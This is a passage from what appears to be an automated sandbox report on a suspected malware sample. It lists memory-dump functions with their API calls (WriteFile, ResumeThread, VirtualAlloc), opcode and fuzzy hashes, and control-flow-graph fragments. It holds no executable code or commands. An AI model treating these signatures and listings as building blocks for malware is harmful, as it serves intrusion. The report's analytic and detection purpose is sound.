                                                                                                                                                                    control_flow_graph 1750 7ffd9b8bd2f5-7ffd9b8bd3c2 1753 7ffd9b8bd3ea-7ffd9b8bd48d WriteFile 1750->1753 1754 7ffd9b8bd3c4-7ffd9b8bd3e7 1750->1754 1755 7ffd9b8bd495-7ffd9b8bd4f1 1753->1755 1756 7ffd9b8bd48f 1753->1756 1754->1753 1756->1755
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: e2e52c401e75581fd3287de6184f8fd71ca8c34008707791e825e850f7d93292
                                                                                                                                                                    • Instruction ID: 65b0dcbceaad9b2dc83b1e51068db24fb45080cc32a49a7712d47d750aeac56d
                                                                                                                                                                    • Opcode Fuzzy Hash: e2e52c401e75581fd3287de6184f8fd71ca8c34008707791e825e850f7d93292
                                                                                                                                                                    • Instruction Fuzzy Hash: B7610370A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3251DA74A985CF40
                                                                                                                                                                    Function 00007FFD9B920897 Relevance: 1.7, APIs: 1, Instructions: 175threadCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1758 7ffd9b920897-7ffd9b9208a0 1759 7ffd9b9208a2-7ffd9b9208dd 1758->1759 1760 7ffd9b9208ea-7ffd9b9209b2 ResumeThread 1758->1760 1763 7ffd9b9208e0-7ffd9b9208e7 1759->1763 1764 7ffd9b9208df 1759->1764 1767 7ffd9b9209b4 1760->1767 1768 7ffd9b9209ba-7ffd9b920a04 1760->1768 1763->1760 1764->1763 1767->1768
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                    • Opcode ID: fd358be5e9db3bc355a47c68d0d1809801fac28020b581e65e0ee4a454fc9dec
                                                                                                                                                                    • Instruction ID: b93be56b4db8c7b9398157074f5b61259403d799ad263dfbfb56f28c68f4453c
                                                                                                                                                                    • Opcode Fuzzy Hash: fd358be5e9db3bc355a47c68d0d1809801fac28020b581e65e0ee4a454fc9dec
                                                                                                                                                                    • Instruction Fuzzy Hash: 81519E30D0864C8FDB59EFA8D855AEDBBF0EF56310F1041ABD04DD7252DA35A986CB41
                                                                                                                                                                    Function 00007FFD9B8BEC91 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: af5f634460a1149d9e5fe11096e83691bf6ec265289c2c324cdeb79867b87014
                                                                                                                                                                    • Instruction ID: f5214fd8ffecf3dc0a9bb765a3302126e5d8bd9ab98358d7a0b2fcb32b6c3677
                                                                                                                                                                    • Opcode Fuzzy Hash: af5f634460a1149d9e5fe11096e83691bf6ec265289c2c324cdeb79867b87014
                                                                                                                                                                    • Instruction Fuzzy Hash: AD41B03090C68C8FDB99DFA8D859BE9BBF0EF5A310F0441ABD04DD72A2CA745946CB40
                                                                                                                                                                    Function 00007FFD9BE400C5 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ^
                                                                                                                                                                    • API String ID: 0-1590793086
                                                                                                                                                                    • Opcode ID: bb1694fc6365f7c4b9babb32277825fe0ad95120a7a4ce0d22f97ac36ff2e085
                                                                                                                                                                    • Instruction ID: d21860e68fae6cb3ddb93fad034f03d8d19b1656d4fa0a471ac019a77c6d9015
                                                                                                                                                                    • Opcode Fuzzy Hash: bb1694fc6365f7c4b9babb32277825fe0ad95120a7a4ce0d22f97ac36ff2e085
                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41D323F0E06B8AF23976EC38714FCBB49DF50BA5B1A02B7D05D8A1E79C492D4256C5
                                                                                                                                                                    Function 00007FFD9B8BF0F5 Relevance: 1.4, APIs: 1, Instructions: 195memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: 0cef203747826887a08e41f7088ccda23bd26eb70657949a8b948d9d6baa8e18
                                                                                                                                                                    • Instruction ID: 89b60dac854f2017d51610db605dd21c01279430ea664a338751406fbf711618
                                                                                                                                                                    • Opcode Fuzzy Hash: 0cef203747826887a08e41f7088ccda23bd26eb70657949a8b948d9d6baa8e18
                                                                                                                                                                    • Instruction Fuzzy Hash: BF511874918A5C8FDF98DF58C895BE9BBF0FB69310F1042AAD04DE3251DB70A985CB81
                                                                                                                                                                    Function 00007FFD9BA855E8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 1622c67426a84a8e4cbc75f17d0200da2ec000eb38dfd708cf2a65f599ff5ae0
                                                                                                                                                                    • Instruction ID: 8f70f2fd79469939e0a91373a5f7c395a71883fae4401cc377d70f5a699053b8
                                                                                                                                                                    • Opcode Fuzzy Hash: 1622c67426a84a8e4cbc75f17d0200da2ec000eb38dfd708cf2a65f599ff5ae0
                                                                                                                                                                    • Instruction Fuzzy Hash: E0519C71E09A4E8FDB6DDB98C8A15FCB7B1FF54300F1540BAC41AE76A2DA742A01CB40
                                                                                                                                                                    Function 00007FFD9BE42C58 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 92c70bc45e52db9f39ba9350a141f23c26b3f265396b70690d5af1727ce6d4ce
                                                                                                                                                                    • Instruction ID: 76caff50c1f7e51601ec7e9dbce44b94ffe1f6427f39c710b1afd9ed916ada7a
                                                                                                                                                                    • Opcode Fuzzy Hash: 92c70bc45e52db9f39ba9350a141f23c26b3f265396b70690d5af1727ce6d4ce
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E516A31E1964E8FDB59DFD8C4615FDB7B2EF88300F1140BAC01AE72A6DA396A05CB50
                                                                                                                                                                    Function 00007FFD9BE4A748 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 86d40f73d7f772e8a9ab835e583333d468095bd835ccc1dc9cebd17f756433d4
                                                                                                                                                                    • Instruction ID: 2aa99e5adf98a9a55453bae5922a1a5f0009238aabc9413b9f94960d9110b1cc
                                                                                                                                                                    • Opcode Fuzzy Hash: 86d40f73d7f772e8a9ab835e583333d468095bd835ccc1dc9cebd17f756433d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 15518E31E0954E8FDB68DB98C4A55FDB7B6FF48310F1141BAD01AE72A2DA352A02CB40
                                                                                                                                                                    Function 00007FFD9BA8E178 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                    • Opcode ID: 33f3685f2b51750a34c49d49485acee3b81b704e726116791c90c2458b2e189c
                                                                                                                                                                    • Instruction ID: 769ad67bc49923029e5a233fd18d8f42190d9bd08be6751837733abdb4cf4609
                                                                                                                                                                    • Opcode Fuzzy Hash: 33f3685f2b51750a34c49d49485acee3b81b704e726116791c90c2458b2e189c
                                                                                                                                                                    • Instruction Fuzzy Hash: F4515E71E09A4E8FDB59DB98C4605BDB7B1FF58300F1140BED01AE76A6DA786A01CB41
                                                                                                                                                                    Function 00007FFD9BA83580 Relevance: .7, Instructions: 681COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d96600754ba800f706b5550b479d8f141e8f5fecf58b31ba78654559d4a935e2
                                                                                                                                                                    • Instruction ID: 64431a0a4f95850b846ac864c545a68a58e778c5cad641b542f594daf59b85aa
                                                                                                                                                                    • Opcode Fuzzy Hash: d96600754ba800f706b5550b479d8f141e8f5fecf58b31ba78654559d4a935e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B22A330B19A1D8FDBA8DB48C8A5A79B7E1FF54310B1141B9E00EC76A2DE75ED45CB80
                                                                                                                                                                    Function 00007FFD9BE43F11 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6967c874928911fa29d13b202971d30ae8f30cd0e168f78a2cf8848d60eca3f6
                                                                                                                                                                    • Instruction ID: 0378694a3d06017c1f1a3df86fd5b525dfb0a626dd8ecb7355728e34cd05da2c
                                                                                                                                                                    • Opcode Fuzzy Hash: 6967c874928911fa29d13b202971d30ae8f30cd0e168f78a2cf8848d60eca3f6
                                                                                                                                                                    • Instruction Fuzzy Hash: E1E1F530B0EA0A8FE378DBA8D4A157577F6FF55300B11457EC44EC3AA2DE2ABA418741
                                                                                                                                                                    Function 00007FFD9BA8E3EF Relevance: .4, Instructions: 404COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bfb46651b2028c26dfcf10df996fdc9bb1aa5dbf948fff3e1f2fea5ede0fa093
                                                                                                                                                                    • Instruction ID: 80215e4159cd237549826625d271ffb018932c60c151b6feb10d8590ce58050e
                                                                                                                                                                    • Opcode Fuzzy Hash: bfb46651b2028c26dfcf10df996fdc9bb1aa5dbf948fff3e1f2fea5ede0fa093
                                                                                                                                                                    • Instruction Fuzzy Hash: D5E1E230619949CFEB5CCF58C0E05B537A1FF45310B5546BDC84ECBA9ADA78E982CB41
                                                                                                                                                                    Function 00007FFD9BA868C7 Relevance: .4, Instructions: 385COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c4387f890329cbbed092a77746f7dad185d8c8037ba05ba89a7f52296508207c
                                                                                                                                                                    • Instruction ID: c09caa5c84ae2d0aa42dbbf9f1277754a83effec1bd292936b9e815d698bcf9b
                                                                                                                                                                    • Opcode Fuzzy Hash: c4387f890329cbbed092a77746f7dad185d8c8037ba05ba89a7f52296508207c
                                                                                                                                                                    • Instruction Fuzzy Hash: 10D10430A0EF4A8FE378DBA8D4A557577E0FF44304B1545BEC08AC7AA2DE79B9428741
                                                                                                                                                                    Function 00007FFD9BE42ECF Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: af47e668d1cc6e8cf428fb456c1e1bfddab19ac6f105d6462895658c95112cae
                                                                                                                                                                    • Instruction ID: 7b1917508ea3cacc1c7295e84e007df8892fa1901f813da01f53ab56b7366705
                                                                                                                                                                    • Opcode Fuzzy Hash: af47e668d1cc6e8cf428fb456c1e1bfddab19ac6f105d6462895658c95112cae
                                                                                                                                                                    • Instruction Fuzzy Hash: B9E1F3306195498FEB5ECF48D4E05B13BA6FF45300B5542BDC84B8B69BDA39F981CB81
                                                                                                                                                                    Function 00007FFD9BE4A9BF Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1962684f77f4ce127b08c93ced3e802e2c84940c9700c3aa449d09f9ec7665db
                                                                                                                                                                    • Instruction ID: 970ce78652bb4d0e6a466e723e153387821371cc4b18cda9f97ab00b10be7367
                                                                                                                                                                    • Opcode Fuzzy Hash: 1962684f77f4ce127b08c93ced3e802e2c84940c9700c3aa449d09f9ec7665db
                                                                                                                                                                    • Instruction Fuzzy Hash: 9CD103306195598FEB5CCF08C0E05B137A6FF48325B6556BDC84B8B69BD639F981CB80
                                                                                                                                                                    Function 00007FFD9BA8587F Relevance: .3, Instructions: 336COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 41d1d3a4ff586e1df6060f0f36c5617eb1bc52a408d16c8b61cdba4841151f5c
                                                                                                                                                                    • Instruction ID: f25e97bd23e02c930bec55891b2ac8080da092a164d79c484d630230ea416a98
                                                                                                                                                                    • Opcode Fuzzy Hash: 41d1d3a4ff586e1df6060f0f36c5617eb1bc52a408d16c8b61cdba4841151f5c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1BC1F17061A90A8BEB2DCF48C4E41B537B1FF45310B5541BDC89B8BA9BDA78E581CB81
                                                                                                                                                                    Function 00007FFD9BE4A9DF Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7a0809578c9abe412cac82972842ed7f52c0dcb6899b36fdbefe851327a90ca8
                                                                                                                                                                    • Instruction ID: e2059283a5d4b364d438333ae7db7398cde72b156400186a048f589c4a334730
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a0809578c9abe412cac82972842ed7f52c0dcb6899b36fdbefe851327a90ca8
                                                                                                                                                                    • Instruction Fuzzy Hash: 66C1133061A54A8FEB2DCF48C0E01B137A6FF45325B6555BDC84B8B69BDA39F981CB40
                                                                                                                                                                    Function 00007FFD9BE42EEF Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5e22e9cd01c6f6897b7375f16bdc8e3ee04007cfd3a0127d3386bd1c2b702e0b
                                                                                                                                                                    • Instruction ID: 5e19941f50c5d891f4c2a19443a8178c24a659507e31b09300a62db671b96422
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e22e9cd01c6f6897b7375f16bdc8e3ee04007cfd3a0127d3386bd1c2b702e0b
                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC1033061954A8FEB2ECF48D4E05B137A6FF45300B5546BDC84B8B69BDA39F981CB81
                                                                                                                                                                    Function 00007FFD9BA8E40F Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c8552780d80f7744ab3966d9d5706dbe6588c259f4bc11475d803754ae4fa980
                                                                                                                                                                    • Instruction ID: f70b9413f9156d98f6568fabd6bcf72bdcf1f996d25408c0d2cea45f7e618d24
                                                                                                                                                                    • Opcode Fuzzy Hash: c8552780d80f7744ab3966d9d5706dbe6588c259f4bc11475d803754ae4fa980
                                                                                                                                                                    • Instruction Fuzzy Hash: D9C1E13061994ACBEB2CCF48C0E05B537A1FF45310B5546BDC84F8BA9ADA78F582CB81
                                                                                                                                                                    Function 00007FFD9BE47C37 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 14310dfc30c2fb4b3b980593eee25de0a373781602886692d1ef251e6d8df72a
                                                                                                                                                                    • Instruction ID: 1c9309c383c629349096cb281c9724b0737abecb55a58a55f0dbd595a6004b1a
                                                                                                                                                                    • Opcode Fuzzy Hash: 14310dfc30c2fb4b3b980593eee25de0a373781602886692d1ef251e6d8df72a
                                                                                                                                                                    • Instruction Fuzzy Hash: CF31E852F0F1AB86F23862E829710F877479F51360F5607BBC04D860E6DC4E6E8552CB
                                                                                                                                                                    Function 00007FFD9BA85112 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 756761a6220f2e90f19a2c55dc97b048c7255c86f2c4965acf90c3442d247717
                                                                                                                                                                    • Instruction ID: 9fe2085598a3c5b606edd0abc568055a46c083bd0a6da52f41391fd0463d95c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 756761a6220f2e90f19a2c55dc97b048c7255c86f2c4965acf90c3442d247717
                                                                                                                                                                    • Instruction Fuzzy Hash: BEB1D030B09E4A8FE359DF68C4A16A4B7A1FF58300F554179C44EC7E96DBB8B9518B80
                                                                                                                                                                    Function 00007FFD9BE4A272 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1769662746.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9be40000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0255b61f8ac532e38d69c32dc6bb967d696a6e038411fd52c30db7935fa06676
                                                                                                                                                                    • Instruction ID: f0f04dec6e5aa7599d6f6e45232a4d3efed29e295a2a191ce5a7f9c59a1a6288
                                                                                                                                                                    • Opcode Fuzzy Hash: 0255b61f8ac532e38d69c32dc6bb967d696a6e038411fd52c30db7935fa06676
                                                                                                                                                                    • Instruction Fuzzy Hash: E3B11430B0994E8FE369DF68C0A06B4B7A6FF58320F555179C04EC7A96DB39B951CB80
                                                                                                                                                                    Function 00007FFD9BA8DCA2 Relevance: .3, Instructions: 318COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b9f71e7ea744671fe3520fcee3bfa3cc337430e7db6c8d5520e875587eff06b1
                                                                                                                                                                    • Instruction ID: 559d7ee5a446d9d34911a124bf99cf9ab861624ec3a2d5461dac0abafb902e9f
                                                                                                                                                                    • Opcode Fuzzy Hash: b9f71e7ea744671fe3520fcee3bfa3cc337430e7db6c8d5520e875587eff06b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 69B1C230B1AD4A9FD759DF68C0A06A4B7A1FF58300F55417DC08ECBEA6DB78B9518780
                                                                                                                                                                    Function 00007FFD9BA8B677 Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 973aae27cf8aeea82f82b9c5a01243246973e222fdddb01f8bcd97cff60898a1
                                                                                                                                                                    • Instruction ID: 65d0e0b29244da99e2e5690806f6e6cf7a3ea466f9164ce02244fdcee8924a17
                                                                                                                                                                    • Opcode Fuzzy Hash: 973aae27cf8aeea82f82b9c5a01243246973e222fdddb01f8bcd97cff60898a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 8031C732F0E99E8BF33467A964754B87790AF58320F5A017BC44E468E2DCBE2A556381
                                                                                                                                                                    Function 00007FFD9BE40167 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
